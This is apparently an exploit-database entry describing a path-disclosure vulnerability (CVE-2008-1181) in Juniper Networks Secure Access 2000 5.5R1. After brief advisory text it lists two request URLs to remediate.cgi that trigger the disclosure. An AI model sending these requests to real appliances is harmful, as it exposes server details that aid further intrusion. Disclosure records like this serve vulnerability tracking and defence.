Juniper Networks Secure Access 2000 Web - Root Full Path Disclosure
Author: Richard Brain
type: webapps
platform: cgi
port:
date_added: 2008-02-28
date_updated: 2014-01-31
verified: 1
codes: CVE-2008-1181;OSVDB-42540
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/28037/info
Juniper Networks Secure Access 2000 is prone to a path-disclosure vulnerability.
Exploiting this issue can allow an attacker to access sensitive data that may be used to launch further attacks.
Secure Access 2000 5.5R1 Build 11711 is vulnerable; other versions may also be affected.
https://www.example.com/dana-na/auth/remediate.cgi?action=&step=preauth
https://www.example.com/dana-na/auth/remediate.cgi?step=preauth